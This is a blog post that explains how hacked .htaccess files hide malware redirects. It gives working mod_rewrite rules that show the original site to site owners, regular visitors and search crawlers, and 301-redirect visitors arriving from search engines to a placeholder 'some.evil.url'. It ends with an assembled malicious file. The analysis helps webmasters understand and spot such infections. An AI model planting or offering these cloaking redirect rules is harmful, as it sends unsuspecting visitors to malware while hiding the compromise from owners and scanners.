Hacked .htaccess: how they work


My work consists of helping people with their websites. A direct result of this is that I see lots of sites getting hacked. Lots of them.

In this post I won’t tell you how to prevent this, and I’m not here to lecture. This is just a quick analysis of how a ‘hacked’ site does its evil work…

Every now and then a customer complains about his site being hacked. Usually it’s not done very gently, and is therefore spotted rather quickly. Sometimes, however, people’s sites get hacked without them knowing it. They usually only find out after complaints from other people that the website tried to infect them with a virus.

How does this work? Rather easily. In this blog post I will try to show you how some types of infection hide and spread themselves. I won’t discuss the details of how to get infected (or not). There are many vectors that can be used to inject code into an innocent website. You could crack the FTP account, giving you full access. You could exploit weaknesses in the site itself to upload malicious code. Or you could use a virus to lift people’s FTP credentials right off their own computers.

As a virus, or as a website trying to spread one, you want to stay undetected for as long as possible. The longer you can do your work, the more potential victims. The most important person to hide from is the webmaster/owner of the site you are using to direct people to the sites that deliver your payload. As long as he hasn’t found out yet, you can keep doing your thing.

The nice part about .htaccess files is not just that you can use them to send people somewhere else. The best part (for our purposes) is that you can redirect people based on who they are and how they visit the target site. The first person to avoid is the webmaster of the site, and avoiding him is easy: just let anyone who visits the site directly (i.e. through a bookmark, or by typing the address) see the original site. This doesn’t require any extra work or code, so the first one is an easy one.

Besides the owner, there are some other people you’ll want to avoid as well: the site’s regular visitors. Just like the owner, they will visit the site directly, and most likely they won’t send a Referer header with their requests.
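
A minimal sketch of that check (assuming mod_rewrite is available and `RewriteEngine On` has been set earlier in the file) would simply match an empty Referer and stop rewriting for those requests:

```apache
# Direct visitors (bookmarks, typed URLs) send no Referer header,
# so serve them the untouched site and stop processing further rules.
RewriteCond %{HTTP_REFERER} ^$
RewriteRule .* - [L]
```

The `-` substitution means “don’t rewrite anything”, and the `[L]` flag stops rule processing for that request.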
Now that we have avoided them, it’s time for our next target. This one is about staying undetected just a little bit longer. As you might know, Google and other search engines will send visitors to your site. They will also warn people if they know a site is fraudulent or is hosting/spreading malware. So we want to keep the crawlers as our friends. Let’s give them a similar treatment to the one we gave the website owner:

RewriteCond %{HTTP_USER_AGENT} (googlebot|yahooseeker|bingbot) [NC]
RewriteRule .* - [L]

So what do we have now? We have set up rewrite conditions for crawlers, so the site will keep being indexed properly, and the webmaster and recurring visitors are left alone. But how do we treat all the new people that visit the site? These people have one thing in common: new visitors will most likely arrive through a search engine or another site. This gives them very specific HTTP_REFERER headers we can check for:

RewriteCond %{HTTP_REFERER} (google|ask|baidu|yahoo|youtube) [NC,OR]
RewriteCond %{HTTP_REFERER} (wikipedia|web|websuche) [NC]
RewriteRule ^(.*)$ http://some.evil.url [R=301,L]

These are just a few of the referers that can be sent. The final script would have to check for quite a few more, but these sets of rules and conditions should give you an idea of how this works.
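
Putting the pieces together, a complete malicious .htaccess might look something like the sketch below. This is an illustration, not a real sample: `some.evil.url` is the placeholder used above, and in the wild the user-agent and referer lists would be much longer.

```apache
RewriteEngine On

# Crawlers: serve the original site so it keeps its clean reputation.
RewriteCond %{HTTP_USER_AGENT} (googlebot|yahooseeker|bingbot) [NC]
RewriteRule .* - [L]

# Direct visitors (the owner and regulars): no Referer header, leave them alone.
RewriteCond %{HTTP_REFERER} ^$
RewriteRule .* - [L]

# Everyone arriving from a search engine or another site: redirect to the payload.
RewriteCond %{HTTP_REFERER} (google|ask|baidu|yahoo|youtube) [NC,OR]
RewriteCond %{HTTP_REFERER} (wikipedia|web|websuche) [NC]
RewriteRule ^(.*)$ http://some.evil.url [R=301,L]
```

The ordering matters: crawlers and direct visitors hit a `[L]` rule first and never reach the redirect at the bottom.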

Of course, for this to work you would need access to the webhosting account of the target site. Uploading these files can be done after you have gained FTP access, or you can use a weakness in the site itself. Neither of those subjects is what this article is about though, so I’ll leave that one open. :)